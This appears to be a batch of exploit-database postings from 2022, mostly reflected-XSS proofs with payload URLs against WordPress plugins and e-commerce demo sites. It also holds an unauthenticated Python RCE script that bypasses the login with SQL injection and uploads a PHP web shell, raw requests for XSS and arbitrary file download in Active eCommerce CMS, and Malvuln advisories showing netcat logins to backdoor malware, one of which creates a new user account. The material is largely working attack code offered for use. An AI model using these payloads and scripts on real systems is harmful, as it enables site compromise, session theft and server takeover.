<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : forym.xyz │<br />│ Vendor : codecanyon.net │<br />│ Software : Forym 1.5.7 - Modern Discussion Forum for Wordpress │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 's' is vulnerable to XSS<br /><br />https://forym.xyz/?s=ax0zq%22%3e%3cscript%3ealert(1)%3c%2fscript%3efkdbh<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : sabaidiscuss.com │<br />│ Vendor : Sabai Discuss │<br />│ Software : Sabai Discuss - Q&A forum plugin V1.4.13 for WordPress │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'field_number[min]' is vulnerable to XSS<br /><br />https://demo.sabaidiscuss.com/questions?category=77&filter=1&field_number[min]=33lnoiy%22%3e%3cscript%3ealert(1)%3c%2fscript%3epfucn<br /><br /><br />GET parameter 'field_number[max]' is vulnerable to XSS<br /><br />https://demo.sabaidiscuss.com/questions?category=77&filter=1&field_number[max]=33lnoiy%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Epfucn<br /><br /><br />GET parameter 'field_range[min]' is vulnerable to XSS<br /> <br />https://demo.sabaidiscuss.com/questions?category=77&filter=1&field_range[min]=6dstzy%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyl1zm<br /><br /><br />GET parameter 'field_range[max]' is vulnerable to XSS<br /><br />https://demo.sabaidiscuss.com/questions?category=77&filter=1&field_range[max]=6dstzy%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyl1zm<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Online Diagnostic Lab Management System - Remote Code Execution (RCE) (Unauthenticated)<br /># Google Dork: N/A<br /># Date: 2022-9-23<br /># Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11<br /># Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip<br /># Tested on: windows 11 - XAMPP<br /># CVE : N/A<br /># Version: 1.0<br /># Authentication Required: bypass login with sql injection <br /><br />#/usr/bin/python3 <br /><br />import requests <br />import os<br />import sys<br />import time<br />import random<br /><br /># clean screen<br />os.system("cls")<br />os.system("clear")<br /><br />logo = '''<br />##################################################################<br /># # <br /># Exploit Script ( Online Diagnostic Lab Management System ) #<br /># #<br />##################################################################<br />'''<br />print(logo)<br /><br />url = str(input("Enter website url : "))<br />username = ("' OR 1=1-- -")<br />password = ("test")<br /><br />req = requests.Session()<br /><br />target = url+"/diagnostic/login.php"<br />data = {'username':username,'password':password}<br /><br />website = req.post(target,data=data)<br />files = open("rev.php","w")<br />payload = "<?php system($_GET['cmd']);?>"<br />files.write(payload)<br />files.close()<br /><br />hash = random.getrandbits(128)<br />name_file = str(hash)+".php"<br />if "Login Successfully" in website.text:<br /> <br /> print("[+] Login Successfully")<br /> website_1 = url+"/diagnostic/php_action/createOrder.php"<br /><br /> upload_file = { <br /> "orderDate": (None,""),<br /> "clientName": (None,""),<br /> "clientContact" : (None,""),<br /> "productName[]" : (None,""),<br /> "rateValue[]" : (None,""),<br /> "quantity[]" : (None,""),<br /> "totalValue[]" : (None,""),<br /> "subTotalValue" : (None,""),<br /> "totalAmountValue" : (None,""),<br /> "discount" : (None,""),<br /> "grandTotalValue" : (None,""),<br /> "gstn" : (None,""),<br /> "vatValue" : (None,""),<br /> "paid" : (None,""),<br /> "dueValue" : (None,""),<br /> "paymentType" : (None,""),<br /> "paymentStatus" : (None,""),<br /> "paymentPlace" : (None,""),<br /> "productImage" : (name_file,open("rev.php","rb"))<br /> } <br /><br /> up = req.post(website_1,files=upload_file)<br /> print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)<br /> print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")<br />else: <br /> print("[-] Check username or password") <br /><br /><br /><br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : Ovatheme.com │<br />│ Vendor : Ovatheme │<br />│ Software : BRW - Booking Rental 1.3.1 Plugin WooCommerce │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'ovabrw_pickup_date' is vulnerable to XSS<br /><br />https://demo.ovatheme.com/brw/?ovabrw_name_product=&cat=car&ovabrw_pickup_loc=Airport&ovabrw_pickoff_loc=Airport&ovabrw_pickup_date=[XSS]&ovabrw_pickoff_date=&ovabrw_attribute=color&color=blue&ovabrw_tag_product=&taxonomy_default1_name=&taxonomy_default2_name=&brw_hotel_type_name=&brw_car_year_name=&brw_boat_height_name=&brw_boat_width_name=&brw_bmw_model_name=&brw_ford_model_name=&order=ASC&orderby=date&ovabrw_search_product=ovabrw_search_product&ovabrw_search=search_item&post_type=product<br /><br /><br />GET parameter 'ovabrw_pickoff_date' is vulnerable to XSS<br /><br />https://demo.ovatheme.com/brw/?ovabrw_name_product=&cat=car&ovabrw_pickup_loc=Airport&ovabrw_pickoff_loc=Airport&ovabrw_pickup_date=&ovabrw_pickoff_date=[XSS]&ovabrw_attribute=color&color=blue&ovabrw_tag_product=&taxonomy_default1_name=&taxonomy_default2_name=&brw_hotel_type_name=&brw_car_year_name=&brw_boat_height_name=&brw_boat_width_name=&brw_bmw_model_name=&brw_ford_model_name=&order=ASC&orderby=date&ovabrw_search_product=ovabrw_search_product&ovabrw_search=search_item&post_type=product<br /><br /><br /><br />Some XSS Payloads Reflected<br /><br />bbb4l%22%20onfocus%3dalert(1)%20autofocus%3d%20q9s9y<br /><br />ne503%22%20onfocus%3dalert(1)%20autofocus%3d%20sg1gu<br /><br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/0b8cf90ab9820cb3fcb7f1d1b45e4e57.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Psychward.b<br />Vulnerability: Weak Hardcoded Credentials<br />Description: The malware listens on TCP port 8888 and requires authentication. However, the password "4174" is weak and hardcoded in cleartext within the PE file.<br />Family: Psychward<br />Type: PE32<br />MD5: 0b8cf90ab9820cb3fcb7f1d1b45e4e57<br />Vuln ID: MVID-2022-0645<br />Disclosure: 09/25/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 8888<br />connected 09/12/22 20:44:12. version 0.2.1<br />pwd 4174<br />password accepted<br />dir<br />..<br />12520437.cpx 2,151<br />12520850.cpx 2,233<br />@AudioToastIcon.png 308<br />@EnrollmentToastIcon.png 330<br />@VpnToastIcon.png 404<br />@WirelessDisplayToast.png 691<br />aadauthhelper.dll 154,624<br />aadtb.dll 954,880<br />AboveLockAppHost.dll 252,928<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/eacaa12336f50f1c395663fba92a4d32.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Bingle.b<br />Vulnerability: Weak Hardcoded Credentials<br />Description: The malware is packed using ASPack 2.11, listens on TCP port 22 and requires authentication. However, the password "let me in" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.<br />Family: Bingle<br />Type: PE32<br />MD5: eacaa12336f50f1c395663fba92a4d32<br />Vuln ID: MVID-2022-0643 <br />Disclosure: 09/24/2022<br /><br />004029A0 call sub_4010E0<br />004029A5 add esp, 0Ch<br />004029A8 cmp eax, ebp<br />004029AA jge short loc_4029CC<br />004029AC mov edi, [esp+eax*4+230h+var_21C]<br />004029B0 mov ecx, ebx<br />004029B2 xor eax, eax<br />004029B4 repne scasb<br />004029B6 not ecx<br />004029B8 sub edi, ecx<br />004029BA mov edx, ecx<br />004029BC mov esi, edi<br />004029BE mov edi, offset aLetMeIn ; "let me in"<br /><br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 22<br />let me in<br /><br /> Nt Shell 1.0 beta by bingle@email.com.cn<br /> Indicator '#' is NTShell Server output.<br /> Type ?help for support commands beyond cmd;<br /> ?use at command line for support parameters.<br /><br /> Use 'net helpmsg xxx' to see detail message of Error Code.<br /><br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\Users\Victim\Desktop>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\Users\Victim\Desktop>net user hyp3rlinx 1313 /add<br />net user hyp3rlinx 1313 /add<br />The command completed successfully.<br /><br />C:\Users\Victim\Desktop>?help<br />#?autorun [name file "args"] --- add the [file] to autorun when reboot,<br /> [file] default is ntshell.exe<br />#?canceldata --- abort the previous file transfer command<br />#?chdir <dir> --- change the server current dir to <dir>,<br /> can be UNC(share) name<br />#?get <file> [port] --- GET <file> from server, server use [port] to tranfer<br />#?help --- show this HELP<br />#?httpget <url> <file> --- get the 'file' from 'url',<br /> eg:httpget http://192.168.0.1 /hackdir/hackprog.exe<br />#?pskill PID --- Kill the Process with PID<br />#?pslist --- List the all process in system<br />#?put <file> [port] --- PUT <file> to server, server use [port] to tranfer<br />#?quit --- QUIT the telnetd program<br />#?restart [<user> [pass]] --- restart the shell as [user] in stead of<br /> IUSR_computer if [user] specified, no need to reconnect<br />#?sysinfor --- Get the System os information<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Active eCommerce CMS Cross Site Scripting<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405<br /># Version: Version 6.3.0<br /># Tested on Ubuntu 18.04<br /><br /><br />-------Request-----------<br />POST /ajax-search HTTP/1.1<br />Host: localhost<br />Content-Length: 117<br />sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />sec-ch-ua-platform: "Linux"<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663797922828%7D; TawkConnectionTime=0; XSRF-TOKEN=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB; active_ecommerce_cms_session=zQGudzxBZLEDymY6TvM4yDEKrxTAQJ7FAVIAQEBU<br />Connection: close<br /><br />_token=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB&search=%3Cscript%3Ealert(%22oh+bought+the+happines%22)%3C%2Fscript%3E <br /></code></pre>
<pre><code># Exploit Title: Active eCommerce CMS Arbitrary File Download<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405<br /># Version: Version 6.3.0<br /># Tested on Ubuntu 18.04<br /><br />without authentication with for loop user can download all files on the website with numeric ids.<br /><br />/aiz-uploadder/download/{id}<br /><br /><--Vulnerable source code--><br />public function attachment_download($id)<br /> {<br /> $project_attachment = Upload::find($id);<br /> try{<br /> $file_path = public_path($project_attachment->file_name);<br /> return Response::download($file_path);<br /> }catch(\Exception $e){<br /> flash(translate('File does not exist!'))->error();<br /> return back();<br /> }<br /><br /> }<br /><br />-------Request-----------<br /><br /><br />GET /aiz-uploader/download/3 HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Upgrade-Insecure-Requests: 1<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />sec-ch-ua-platform: "Linux"<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: empty<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663797922828%7D; TawkConnectionTime=0; XSRF-TOKEN=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB; active_ecommerce_cms_session=zQGudzxBZLEDymY6TvM4yDEKrxTAQJ7FAVIAQEBU<br />Connection: close<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : pro-demo.livelycart.com │<br />│ Vendor : livelyworks - livelyworks.net │<br />│ Software : LivelyCart Pro 3 - Laravel E-Commerce Platform │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'min_price' is vulnerable to XSS<br /><br />https://pro-demo.livelycart.com/products?min_price=11[XSS]&max_price=999&sort_by=created_at&sort_order=asc&<br /><br />GET parameter 'max_price' is vulnerable to XSS<br /><br />https://pro-demo.livelycart.com/products?min_price=11&max_price=999[XSS]&sort_by=created_at&sort_order=asc&<br /><br /><br /><br />Some XSS Payloads Reflected<br /><br /><br />ss29h"><script>alert(1)</script>gub34<br /><br />yljlw"><script>alert(1)</script>onc87<br /><br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : oscommerce.com │<br />│ Vendor : osCommerce LTD │<br />│ Software : osCommerce Shopping Cart v4 - Reflected XSS │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'keywords' is vulnerable to XSS<br /><br />/catalog/all-products?keywords=[XSS]<br /><br />https://demo.oscommerce.com/watch/catalog/all-products?keywords=d05zz%22%3E%3Cscript%3Ealert(1)%3C/script%3Eju3gw<br /><br />https://demo.oscommerce.com/printshop/catalog/all-products?keywords=d05zz%22%3e%3cscript%3ealert(1)%3c%2fscript%3eju3gw<br /><br />https://demo.oscommerce.com/furniture/catalog/all-products?keywords=d05zz%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Eju3gw<br /><br /><br /><br /><br /><br />[-] Done<br /></code></pre>